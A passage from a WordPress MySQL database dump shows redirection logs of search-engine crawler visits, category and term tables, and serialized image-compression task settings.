23:37:42','/londonmarathon','https://www.westonspirit.org.uk','/money-talks.asp','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)',NULL,301,'GET',NULL,'redirection',2,'157.90.181.145'),(182,'2021-08-20 21:16:13','/can-a-smile-makeover-really-change-your-life','https://www.westonspirit.org.uk','https://www.westonspirit.org.uk/contact-us','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,301,'GET',NULL,'redirection',7,'66.249.69.122'),(183,'2021-08-21 01:58:44','/can-a-smile-makeover-really-change-your-life','https://www.westonspirit.org.uk','https://www.westonspirit.org.uk/contact-us','Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)',NULL,301,'GET',NULL,'redirection',7,'54.36.148.15'),(184,'2021-08-22 02:43:34','/can-a-smile-makeover-really-change-your-life','https://www.westonspirit.org.uk','https://www.westonspirit.org.uk/contact-us','Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)',NULL,301,'GET',NULL,'redirection',7,'114.119.148.88'),(185,'2021-08-22 12:28:36','/can-a-smile-makeover-really-change-your-life','https://www.westonspirit.org.uk','https://www.westonspirit.org.uk/contact-us','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,301,'GET',NULL,'redirection',7,'66.249.64.124'),(186,'2021-08-23 05:14:59','/londonmarathon','https://www.westonspirit.org.uk','/money-talks.asp','Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)',NULL,301,'GET',NULL,'redirection',2,'185.191.171.40'),(187,'2021-08-23 09:00:41','/londonmarathon','https://www.westonspirit.org.uk','/money-talks.asp','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)',NULL,301,'GET',NULL,'redirection',2,'157.90.181.145'),(188,'2021-08-25 01:17:31','/home.html','https://www.westonspirit.org.uk','/','Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)',NULL,301,'GET',NULL,'redirection',3,'216.244.66.239'),(189,'2021-08-25 09:29:00','/londonmarathon','https://www.westonspirit.org.uk','/money-talks.asp','Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)',NULL,301,'GET',NULL,'redirection',2,'185.191.171.39');
/*!40000 ALTER TABLE `wp_redirection_logs` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_term_relationships`
--

DROP TABLE IF EXISTS `wp_term_relationships`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_term_relationships` (
  `object_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `term_taxonomy_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `term_order` int(11) NOT NULL DEFAULT 0,
  PRIMARY KEY (`object_id`,`term_taxonomy_id`),
  KEY `term_taxonomy_id` (`term_taxonomy_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_term_relationships`
--

LOCK TABLES `wp_term_relationships` WRITE;
/*!40000 ALTER TABLE `wp_term_relationships` DISABLE KEYS */;
INSERT INTO `wp_term_relationships` VALUES (33,1,0),(34,1,0),(35,1,0),(37,1,0),(38,1,0),(39,1,0),(40,1,0),(41,1,0),(42,1,0),(43,1,0),(44,1,0),(45,1,0),(46,1,0),(48,1,0),(49,1,0),(50,1,0),(51,1,0),(52,1,0),(53,1,0),(54,1,0),(55,1,0),(56,1,0),(57,1,0),(58,1,0),(59,1,0),(61,1,0),(62,1,0),(63,1,0),(64,1,0),(65,1,0),(66,1,0),(67,1,0),(68,1,0),(69,1,0),(70,1,0),(72,1,0),(73,1,0),(75,1,0),(76,1,0),(77,1,0),(78,1,0),(79,1,0),(80,1,0),(81,1,0),(82,1,0),(83,1,0),(84,1,0),(85,1,0),(86,1,0),(87,1,0),(89,1,0),(90,1,0),(91,1,0),(92,1,0),(94,1,0),(95,1,0),(96,1,0),(97,1,0),(98,1,0),(100,1,0),(101,1,0),(102,1,0),(103,1,0),(104,1,0),(105,1,0),(107,1,0),(108,1,0),(109,1,0),(110,1,0),(111,1,0),(112,1,0),(113,1,0),(114,1,0),(115,1,0),(117,1,0),(118,1,0),(119,1,0),(120,1,0),(121,1,0),(122,1,0),(123,1,0),(124,1,0),(125,1,0),(126,1,0),(127,1,0),(129,1,0),(130,1,0),(131,1,0),(132,1,0),(133,1,0),(134,1,0),(135,1,0),(136,1,0),(137,1,0),(138,1,0),(139,1,0),(140,1,0),(141,1,0),(143,1,0),(144,1,0),(145,1,0),(146,1,0),(147,1,0),(148,1,0),(149,1,0),(150,1,0),(151,1,0),(152,1,0),(153,1,0),(155,1,0),(156,1,0),(157,1,0),(158,1,0),(159,1,0),(160,1,0),(161,1,0),(162,1,0),(163,1,0),(164,1,0),(166,1,0),(167,1,0),(168,1,0),(169,1,0),(170,1,0),(171,1,0),(172,1,0),(173,1,0),(174,1,0),(175,1,0),(176,1,0),(177,1,0),(179,1,0),(180,1,0),(181,1,0),(182,1,0),(183,1,0),(184,1,0),(185,1,0),(186,1,0),(188,1,0),(189,1,0),(190,1,0),(192,1,0),(193,1,0),(194,1,0),(195,1,0),(196,1,0),(197,1,0),(198,1,0),(199,1,0),(200,1,0),(201,1,0),(202,1,0),(203,1,0),(205,1,0),(206,1,0),(207,1,0),(208,1,0),(209,1,0),(210,1,0),(211,1,0),(212,1,0),(213,1,0),(214,1,0),(215,1,0),(216,1,0),(217,1,0),(218,1,0),(219,1,0),(221,1,0),(222,1,0),(223,1,0),(224,1,0),(225,1,0),(226,1,0),(227,1,0),(229,1,0),(230,1,0),(231,1,0),(232,1,0),(233,1,0),(235,1,0),(236,1,0),(237,1,0),(238,1,0),(239,1,0),(240,1,0),(241,1,0),(242,1,0),(243,1,0),(244,1,0),(245,1,0),(246,1,0),(247,1,0),(249,1,0),(250,1,0),(251,1,0),(252,1,0),(253,1,0),(254,1,0),(255,1,0),(256,1,0),(257,1,0),(258,1,0),(259,1,0),(260,1,0),(261,1,0),(262,1,0),(263,1,0),(264,1,0),(265,1,0),(266,1,0),(267,1,0),(269,1,0),(270,1,0),(271,1,0),(272,1,0),(273,1,0),(274,1,0),(275,1,0),(276,1,0),(277,1,0),(278,1,0),(279,1,0),(280,1,0),(281,1,0),(282,1,0),(284,1,0),(285,1,0),(286,1,0),(287,1,0),(288,1,0),(289,1,0),(290,1,0),(291,1,0),(292,1,0),(294,1,0),(295,1,0),(296,1,0),(297,1,0),(577,1,0),(592,1,0),(592,3,0),(598,3,0),(605,1,0),(627,4,0),(632,4,0),(632,5,0),(653,3,0),(653,6,0),(660,7,0),(660,8,0),(660,9,0),(668,10,0),(669,10,0),(670,10,0),(675,10,0),(676,10,0),(688,10,0),(689,10,0),(690,10,0),(691,10,0);
/*!40000 ALTER TABLE `wp_term_relationships` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_term_taxonomy`
--

DROP TABLE IF EXISTS `wp_term_taxonomy`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_term_taxonomy` (
  `term_taxonomy_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `term_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `taxonomy` varchar(32) NOT NULL DEFAULT '',
  `description` longtext NOT NULL,
  `parent` bigint(20) unsigned NOT NULL DEFAULT 0,
  `count` bigint(20) NOT NULL DEFAULT 0,
  PRIMARY KEY (`term_taxonomy_id`),
  UNIQUE KEY `term_id_taxonomy` (`term_id`,`taxonomy`),
  KEY `taxonomy` (`taxonomy`)
) ENGINE=InnoDB AUTO_INCREMENT=11 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_term_taxonomy`
--

LOCK TABLES `wp_term_taxonomy` WRITE;
/*!40000 ALTER TABLE `wp_term_taxonomy` DISABLE KEYS */;
INSERT INTO `wp_term_taxonomy` VALUES (1,1,'category','',0,243),(3,3,'category','',0,3),(4,4,'category','',0,2),(5,5,'category','',0,1),(6,6,'post_tag','',0,1),(7,7,'post_tag','',0,1),(8,8,'post_tag','',0,1),(9,9,'category','',0,1),(10,10,'nav_menu','',0,9);
/*!40000 ALTER TABLE `wp_term_taxonomy` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_termmeta`
--

DROP TABLE IF EXISTS `wp_termmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_termmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `term_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `term_id` (`term_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_termmeta`
--

LOCK TABLES `wp_termmeta` WRITE;
/*!40000 ALTER TABLE `wp_termmeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_termmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_terms`
--

DROP TABLE IF EXISTS `wp_terms`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_terms` (
  `term_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(200) NOT NULL DEFAULT '',
  `slug` varchar(200) NOT NULL DEFAULT '',
  `term_group` bigint(10) NOT NULL DEFAULT 0,
  PRIMARY KEY (`term_id`),
  KEY `slug` (`slug`(191)),
  KEY `name` (`name`(191))
) ENGINE=InnoDB AUTO_INCREMENT=11 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_terms`
--

LOCK TABLES `wp_terms` WRITE;
/*!40000 ALTER TABLE `wp_terms` DISABLE KEYS */;
INSERT INTO `wp_terms` VALUES (1,'UK news','uk_news',0),(3,'Business Advice','business-advice',0),(4,'Beauty','beauty',0),(5,'Dentistry','dentistry',0),(6,'property development','property-development',0),(7,'detox','detox',0),(8,'drug detox','drug-detox',0),(9,'Addiction','addiction',0),(10,'Navigation','navigation',0);
/*!40000 ALTER TABLE `wp_terms` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_tm_taskmeta`
--

DROP TABLE IF EXISTS `wp_tm_taskmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_tm_taskmeta` (
  `meta_id` bigint(20) NOT NULL AUTO_INCREMENT,
  `task_id` bigint(20) NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `meta_key` (`meta_key`(191)),
  KEY `task_id` (`task_id`)
) ENGINE=InnoDB AUTO_INCREMENT=89 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_tm_taskmeta`
--

LOCK TABLES `wp_tm_taskmeta` WRITE;
/*!40000 ALTER TABLE `wp_tm_taskmeta` DISABLE KEYS */;
INSERT INTO `wp_tm_taskmeta` VALUES (1,1,'task_options','a:14:{s:18:\"allowed_file_types\";s:77:\"a:5:{i:0;s:3:\"gif\";i:1;s:3:\"png\";i:2;s:3:\"jpg\";i:3;s:3:\"tif\";i:4;s:4:\"jpeg\";}\";s:15:\"request_timeout\";i:30;s:13:\"keep_original\";s:1:\"1\";s:13:\"preserve_exif\";b:1;s:13:\"image_quality\";s:2:\"95\";s:12:\"api_endpoint\";s:22:\"http://api.resmush.it/\";s:12:\"max_filesize\";i:5242880;s:7:\"version\";s:6:\"0.1.13\";s:13:\"backup_prefix\";s:28:\"-updraft-pre-smush-original.\";s:13:\"attachment_id\";i:646;s:7:\"blog_id\";i:1;s:17:\"lossy_compression\";s:1:\"1\";s:13:\"current_stage\";s:9:\"completed\";s:17:\"original_filesize\";i:71026;}'),(2,2,'task_options','a:14:{s:18:\"allowed_file_types\";s:77:\"a:5:{i:0;s:3:\"gif\";i:1;s:3:\"png\";i:2;s:3:\"jpg\";i:3;s:3:\"tif\";i:4;s:4:\"jpeg\";}\";s:15:\"request_timeout\";i:30;s:13:\"keep_original\";s:1:\"1\";s:13:\"preserve_exif\";b:1;s:13:\"image_quality\";s:2:\"95\";s:12:\"api_endpoint\";s:22:\"http://api.resmush.it/\";s:12:\"max_filesize\";i:5242880;s:7:\"version\";s:6:\"0.1.13\";s:13:\"backup_prefix\";s:28:\"-updraft-pre-smush-original.\";s:13:\"attachment_id\";i:645;s:7:\"blog_id\";i:1;s:17:\"lossy_compression\";s:1:\"1\";s:13:\"current_stage\";s:9:\"completed\";s:17:\"original_filesize\";i:111297;}'),(3,3,'task_options','a:14:{s:18:\"allowed_file_types\";s:77:\"a:5:{i:0;s:3:\"gif\";i:1;s:3:\"png\";i:2;s:3:\"jpg\";i:3;s:3:\"tif\";i:4;s:4:\"jpeg\";}\";s:15:\"request_timeout\";i:30;s:13:\"keep_original\";s:1:\"1\";s:13:\"preserve_exif\";b:1;s:13:\"image_quality\";s:2:\"95\";s:12:\"api_endpoint\";s:22:\"http://api.resmush.it/\";s:12:\"max_filesize\";i:5242880;s:7:\"version\";s:6:\"0.1.13\";s:13:\"backup_prefix\";s:28:\"-updraft-pre-smush-original.\";s:13:\"attachment_id\";i:633;s:7:\"blog_id\";i:1;s:17:\"lossy_compression\";s:1:\"1\";s:13:\"current_stage\";s:9:\"completed\";s:17:\"original_filesize\";i:156993;}'),(4,4,'task_options','a:14:{s:18:\"allowed_file_types\";s:77:\"a:5:{i:0;s:3:\"gif\";i:1;s:3:\"png\";i:2;s:3:\"jpg\";i:3;s:3:\"tif\";i:4;s:4:\"jpeg\";}\";s:15:\"request_timeout\";i:30;s:13:\"keep_original\";s:1:\"1\";s:13:\"preserve_exif\";b:1;s:13:\"image_quality\";s:2:\"95\";s:12:\"api_endpoint\";s:22:\"http://api.resmush.it/\";s:12:\"max_filesize\";i:5242880;s:7:\"version\";s:6:\"0.1.13\";s:13:\"backup_prefix\";s:28:\"-updraft-pre-smush-original.\";s:13:\"attachment_id\";i:628;s:7:\"blog_id\";i:1;s:17:\"lossy_compression\";s:1:\"1\";s:13:\"current_stage\";s:9:\"completed\";s:17:\"original_filesize\";i:162886;}'),(5,5,'task_options','a:14:{s:18:\"allowed_file_types\";s:77:\"a:5:{i:0;s:3:\"gif\";i:1;s:3:\"png\";i:2;s:3:\"jpg\";i:3;s:3:\"tif\";i:4;s:4:\"jpeg\";}\";s:15:\"request_timeout\";i:30;s:13:\"keep_original\";s:1:\"1\";s:13:\"preserve_exif\";b:1;s:13:\"image_quality\";s:2:\"95\";s:12:\"api_endpoint\";s:22:\"http://api.resmush.it/\";s:12:\"max_filesize\";i:5242880;s:7:\"version\";s:6:\"0.1.13\";s:13:\"backup_prefix\";s:28:\"-updraft-pre-smush-original.\";s:13:\"attachment_id\";i:622;s:7:\"blog_id\";i:1;s:17:\"lossy_compression\";s:1:\"1\";s:13:\"current_stage\";s:9:\"completed\";s:17:\"original_filesize\";i:103236;}'),(6,6,'task_options','a:14:{s:18:\"allowed_file_types\";s:77:\"a:5:{i:0;s:3:\"gif\";i:1;s:3:\"png\";i:2;s:3:\"jpg\";i:3;s:3:\"tif\";i:4;s:4:\"jpeg\";}\";s:15:\"request_timeout\";i:30;s:13:\"keep_original\";s:1:\"1\";s:13:\"preserve_exif\";b:1;s:13:\"image_quality\";s:2:\"95\";s:12:\"api_endpoint\";s:22:\"http://api.resmush.it/\";s:12:\"max_filesize\";i:5242880;s:7:\"version\";s:6:\"0.1.13\";s:13:\"backup_prefix\";s:28:\"-updraft-pre-smush-original.\";s:13:\"attachment_id\";i:621;s:7:\"blog_id\";i:1;s:17:\"lossy_compression\";s:1:\"1\";s:13:\"current_stage\";s:9:\"completed\";s:17:\"original_filesize\";i:72445;}'),(7,7,'task_options','a:14:{s:18:\"allowed_file_types\";s:77:\"a:5:{i:0;s:3:\"gif\";i:1;s:3:\"png\";i:2;s:3:\"jpg\";i:3;s:3:\"tif\";i:4;s:4:\"jpeg\";}\";s:15:\"request_timeout\";i:30;s:13:\"keep_original\";s:1:\"1\";s:13:\"preserve_exif\";b:1;s:13:\"image_quality\";s:2:\"95\";s:12:\"api_endpoint\";s:22:\"http://api.resmush.it/\";s:12:\"max_filesize\";i:5242880;s:7:\"version\";s:6:\"0.1.13\";s:13:\"backup_prefix\";s:28:\"-updraft-pre-smush-original.\";s:13:\"attachment_id\";i:615;s:7:\"blog_id\";i:1;s:17:\"lossy_compression\";s:1:\"1\";s:13:\"current_stage\";s:9:\"completed\";s:17:\"original_filesize\";i:89740;}'),(8,8,'task_options','a:14:{s:18:\"allowed_file_types\";s:77:\"a:5:{i:0;s:3:\"gif\";i:1;s:3:\"png\";i:2;s:3:\"jpg\";i:3;s:3:\"tif\";i:4;s:4:\"jpeg\";}\";s:15:\"request_timeout\";i:30;s:13:\"keep_original\";s:1:\"1\";s:13:\"preserve_exif\";b:1;s:13:\"image_quality\";s:2:\"95\";s:12:\"api_endpoint\";s:22:\"http://api.resmush.it/\";s:12:\"max_filesize\";i:5242880;s:7:\"version\";s:6:\"0.1.13\";s:13:\"backup_prefix\";s:28:\"-updraft-pre-smush-original.\";s:13:\"attachment_id\";i:614;s:7:\"blog_id\";i:1;s:17:\"lossy_compression\";s:1:\"1\";s:13:\"current_stage\";s:9:\"completed\";s:17:\"original_filesize\";i:66209;}'),(9,9,'task_options','a:14:{s:18:\"allowed_file_types\";s:77:\"a:5:{i:0;s:3:\"gif\";i:1;s:3:\"png\";i:2;s:3:\"jpg\";i:3;s:3:\"tif\";i:4;s:4:\"jpeg\";}\";s:15:\"request_timeout\";i:30;s:13:\"keep_original\";s:1:\"1\";s:13:\"preserve_exif\";b:1;s:13:\"image_quality\";s:2:\"95\";s:12:\"api_endpoint\";s:22:\"http://api.resmush.it/\";s:12:\"max_filesize\";i:5242880;s:7:\"version\";s:6:\"0.1.13\";s:13:\"backup_prefix\";s:28:\"-updraft-pre-smush-original.\";s:13:\"attachment_id\";i:608;s:7:\"blog_id\";i:1;s:17:\"lossy_compression\";s:1:\"1\";s:13:\"current_stage\";s:9:\"completed\";s:17:\"original_filesize\";i:116292;}'),(10,10,'task_options','a:14:{s:18:\"allowed_file_types\";s:77:\"a:5:{i:0;s:3:\"gif\";i:1;s:3:\"png\";i:2;s:3:\"jpg\";i:3;s:3:\"tif\";i:4;s:4:\"jpeg\";}\";s:15:\"request_timeout\";i:30;s:13:\"keep_original\";s:1:\"1\";s:13:\"preserve_exif\";b:1;s:13:\"image_quality\";s:2:\"95\";s:12:\"api_endpoint\";s:22:\"http://api.resmush.it/\";s:12:\"max_filesize\";i:5242880;s:7:\"version\";s:6:\"0.1.13\";s:13:\"backup_prefix\";s:28:\"-updraft-pre-smush-original.\";s:13:\"attachment_id\";i:601;s:7:\"blog_id\";i:1;s:17:\"lossy_compression\";s:1:\"1\";s:13:\"current_stage\";s:9:\"completed\";s:17:\"original_filesize\";i:114900;}'),(11,11,'task_options','a:14:{s:18:\"allowed_file_types\";s:77:\"a:5:{i:0;s:3:\"gif\";i:1;s:3:\"png\";i:2;s:3:\"jpg\";i:3;s:3:\"tif\";i:4;s:4:\"jpeg\";}\";s:15:\"request_timeout\";i:30;s:13:\"keep_original\";s:1:\"1\";s:13:\"preserve_exif\";b:1;s:13:\"image_quality\";s:2:\"95\";s:12:\"api_endpoint\";s:22:\"http://api.resmush.it/\";s:12:\"max_filesize\";i:5242880;s:7:\"version\";s:6:\"0.1.13\";s:13:\"backup_prefix\";s:28:\"-updraft-pre-smush-original.\";s:13:\"attachment_id\";i:596;s:7:\"blog_id\";i:1;s:17:\"lossy_compression\";s:1:\"1\";s:13:\"current_stage\";s:9:\"completed\";s:17:\"original_filesize\";i:143568;}'),(12,12,'task_options','a:14:{s:18:\"allowed_file_types\";s:77:\"a:5:{i:0;s:3:\"gif\";i:1;s:3:\"png\";i:2;s:3:\"jpg\";i:3;s:3:\"tif\";i:4;s:4:\"jpeg\";}\";s:15:\"request_timeout\";i:30;s:13:\"keep_original\";s:1:\"1\";s:13:\"preserve_exif\";b:1;s:13:\"image_quality\";s:2:\"95\";s:12:\"api_endpoint\";s:22:\"http://api.resmush.it/\";s:12:\"max_filesize\";i:5242880;s:7:\"version\";s:6:\"0.1.13\";s:13:\"backup_prefix\";s:28:\"-updraft-pre-smush-original.\";s:13:\"attachment_id\";i:581;s:7:\"blog_id\";i:1;s:17:\"lossy_compression\";s:1:\"1\";s:13:\"current_stage\";s:9:\"completed\";s:17:\"original_filesize\";i:38390;}'),(13,13,'task_options','a:14:{s:18:\"allowed_file_types\";s:77:\"a:5:{i:0;s:3:\"gif\";i:1;s:3:\"png\";i:2;s:3:\"jpg\";i:3;s:3:\"tif\";i:4;s:4:\"jpeg\";}\";s:15:\"request_timeout\";i:30;s:13:\"keep_original\";s:1:\"1\";s:13:\"preserve_exif\";b:1;s:13:\"image_quality\";s:2:\"95\";s:12:\"api_endpoint\";s:22:\"http://api.resmush.it/\";s:12:\"max_filesize\";i:5242880;s:7:\"version\";s:6:\"0.1.13\";s:13:\"backup_prefix\";s:28:\"-updraft-pre-smush-original.\";s:13:\"attachment_id\";i:580;s:7:\"blog_id\";i:1;s:17:\"lossy_compression\";s:1:\"1\";s:13:\"current_stage\";s:9:\"completed\";s:17:\"original_filesize\";i:38390;}'),(14,14,'task_options','a:14:{s:18:\"allowed_file_types\";s:77:\"a:5:{i:0;s:3:\"gif\";i:1;s:3:\"png\";i:2;s:3:\"jpg\";i:3;s:3:\"tif\";i:4;s:4:\"jpeg\";}\";s:15:\"request_timeout\";i:30;s:13:\"keep_original\";s:1:\"1\";s:13:\"preserve_exif\";b:1;s:13:\"image_quality\";s:2:\"95\";s:12:\"api_endpoint\";s:22:\"http://api.resmush.it/\";s:12:\"max_filesize\";i:5242880;s:7:\"version\";s:6:\"0.1.13\";s:13:\"backup_prefix\";s:28:\"-updraft-pre-smush-original.\";s:13:\"attachment_id\";i:485;s:7:\"blog_id\";i:1;s:17:\"lossy_compression\";s:1:\"1\";s:13:\"current_stage\";s:9:\"completed\";s:17:\"original_filesize\";i:1689644;}'),(15,15,'task_options','a:14:{s:18:\"allowed_file_types\";s:77:\"a:5:{i:0;s:3:\"gif\";i:1;s:3:\"png\";i:2;s:3:\"jpg\";i:3;s:3:\"tif\";i:4;s:4:\"jpeg\";}\";s:15:\"request_timeout\";i:30;s:13:\"keep_original\";s:1:\"1\";s:13:\"preserve_exif\";b:1;s:13:\"image_quality\";s:2:\"95\";s:12:\"api_endpoint\";s:22:\"http://api.resmush.it/\";s:12:\"max_filesize\";i:5242880;s:7:\"version\";s:6:\"0.1.13\";s:13:\"backup_prefix\";s:28:\"-updraft-pre-smush-original.\";s:13:\"attachment_id\";i:472;s:7:\"blog_id\";i:1;s:17:\"lossy_compression\";s:1:\"1\";s:13:\"current_stage\";s:9:\"completed\";s:17:\"original_filesize\";i:571341;}'),(16,16,'task_options','a:14:{s:18:\"allowed_file_types\";s:77:\"a:5:{i:0;s:3:\"gif\";i:1;s:3:\"png\";i:2;s:3:\"jpg\";i:3;s:3:\"tif\";i:4;s:4:\"jpeg\";}\";s:15:\"request_timeout\";i:30;s:13:\"keep_original\";s:1:\"1\";s:13:\"preserve_exif\";b:1;s:13:\"image_quality\";s:2:\"95\";s:12:\"api_endpoint\";s:22:\"http://api.resmush.it/\";s:12:\"max_filesize\";i:5242880;s:7:\"version\";s:6:\"0.1.13\";s:13:\"backup_prefix\";s:28:\"-updraft-pre-smush-original.\";s:13:\"attachment_id\";i:469;s:7:\"blog_id\";i:1;s:17:\"lossy_compression\";s:1:\"1\";s:13:\"current_stage\";s:9:\"completed\";s:17:\"original_filesize\";i:1967193;}'),(17,17,'task_options','a:14:{s:18:\"allowed_file_types\";s:77:\"a:5:{i:0;s:3:\"gif\";i:1;s:3:\"png\";i:2;s:3:\"jpg\";i:3;s:3:\"tif\";i:4;s:4:\"jpeg\";}\";s:15:\"request_timeout\";i:30;s:13:\"keep_original\";s:1:\"1\";s:13:\"preserve_exif\";b:1;s:13:\"image_quality\";s:2:\"95\";s:12:\"api_endpoint\";s:22:\"http://api.resmush.it/\";s:12:\"max_filesize\";i:5242880;s:7:\"version\";s:6:\"0.1.13\";s:13:\"backup_prefix\";s:28:\"-updraft-pre-smush-original.\";s:13:\"attachment_id\";i:464;s:7:\"blog_id\";i:1;s:17:\"lossy_compression\";s:1:\"1\";s:13:\"current_stage\";s:9:\"completed\";s:17:\"original_filesize\";i:2437973;}'),(18,18,'task_options','a:14:{s:18:\"allowed_file_types\";s:77:\"a:5:{i:0;s:3:\"gif\";i:1;s:3:\"png\";i:2;s:3:\"jpg\";i:3;s:3:\"tif\";i:4;s:4:\"jpeg\";}\";s:15:\"request_timeout\";i:30;s:13:\"keep_original\";s:1:\"1\";s:13:\"preserve_exif\";b:1;s:13:\"image_quality\";s:2:\"95\";s:12:\"api_endpoint\";s:22:\"http://api.resmush.it/\";s:12:\"max_filesize\";i:5242880;s:7:\"version\";s:6:\"0.1.13\";s:13:\"backup_prefix\";s:28:\"-updraft-pre-smush-original.\";s:13:\"attachment_id\";i:452;s:7:\"blog_id\";i:1;s:17:\"lossy_compression\";s:1:\"1\";s:13:\"current_stage\";s:9:\"completed\";s:17:\"original_filesize\";i:841319;}'),(19,19,'task_options','a:14:{s:18:\"allowed_file_types\";s:77:\"a:5:{i:0;s:3:\"gif\";i:1;s:3:\"png\";i:2;s:3:\"jpg\";i:3;s:3:\"tif\";i:4;s:4:\"jpeg\";}\";s:15:\"request_timeout\";i:30;s:13:\"keep_original\";s:1:\"1\";s:13:\"preserve_exif\";b:1;s:13:\"image_quality\";s:2:\"95\";s:12:\"api_endpoint\";s:22:\"http://api.resmush.it/\";s:12:\"max_filesize\";i:5242880;s:7:\"version\";s:6:\"0.1.13\";s:13:\"backup_prefix\";s:28:\"-updraft-pre-smush-original.\";s:13:\"attachment_id\";i:445;s:7:\"blog_id\";i:1;s:17:\"lossy_compression\";s:1:\"1\";s:13:\"current_stage\";s:9:\"completed\";s:17:\"original_filesize\";i:2782190;}'),(20,20,'task_options','a:14:{s:18:\"allowed_file_types\";s:77:\"a:5:{i:0;s:3:\"gif\";i:1;s:3:\"png\";i:2;s:3:\"jpg\";i:3;s:3:\"tif\";i:4;s:4:\"jpeg\";}\";s:15:\"request_timeout\";i:30;s:13:\"keep_original\";s:1:\"1\";s:13:\"preserve_exif\";b:1;s:13:\"image_quality\";s:2:\"95\";s:12:\"api_endpoint\";s:22:\"http://api.resmush.it/\";s:12:\"max_filesize\";i:5242880;s:7:\"version\";s:6:\"0.1.13\";s:13:\"backup_prefix\";s:28:\"-updraft-pre-smush-original.\";s:13:\"attachment_id\";i:424;s:7:\"blog_id\";i:1;s:17:\"lossy_compression\";s:1:\"1\";s:13:\"current_stage\";s:9:\"completed\";s:17:\"original_filesize\";i:641950;}'),(21,21,'task_options','a:14:{s:18:\"allowed_file_types\";s:77:\"a:5:{i:0;s:3:\"gif\";i:1;s:3:\"png\";i:2;s:3:\"jpg\";i:3;s:3:\"tif\";i:4;s:4:\"jpeg\";}\";s:15:\"request_timeout\";i:30;s:13:\"keep_original\";s:1:\"1\";s:13:\"preserve_exif\";b:1;s:13:\"image_quality\";s:2:\"95\";s:12:\"api_endpoint\";s:22:\"http://api.resmush.it/\";s:12:\"max_filesize\";i:5242880;s:7:\"version\";s:6:\"0.1.13\";s:13:\"backup_prefix\";s:28:\"-updraft-pre-smush-original.\";s:13:\"attachment_id\";i:417;s:7:\"blog_id\";i:1;s:17:\"lossy_compression\";s:1:\"1\";s:13:\"current_stage\";s:9:\"completed\";s:17:\"original_filesize\";i:1810588;}'),(22,22,'task_options','a:14:{s:18:\"allowed_file_types\";s:77:\"a:5:{i:0;s:3:\"gif\";i:1;s:3:\"png\";i:2;s:3:\"jpg\";i:3;s:3:\"tif\";i:4;s:4:\"jpeg\";}\";s:15:\"request_timeout\";i:30;s:13:\"keep_original\";s:1:\"1\";s:13:\"preserve_exif\";b:1;s:13:\"image_quality\";s:2:\"95\";s:12:\"api_endpoint\";s:22:\"http://api.resmush.it/\";s:12:\"max_filesize\";i:5242880;s:7:\"version\";s:6:\"0.1.13\";s:13:\"backup_prefix\";s:28:\"-updraft-pre-smush-original.\";s:13:\"attachment_id\";i:405;s:7:\"blog_id\";i:1;s:17:\"lossy_compression\";s:1:\"1\";s:13:\"current_stage\";s:9:\"completed\";s:17:\"original_filesize\";i:761939;}'),(23,23,'task_options','a:14:{s:18:\"allowe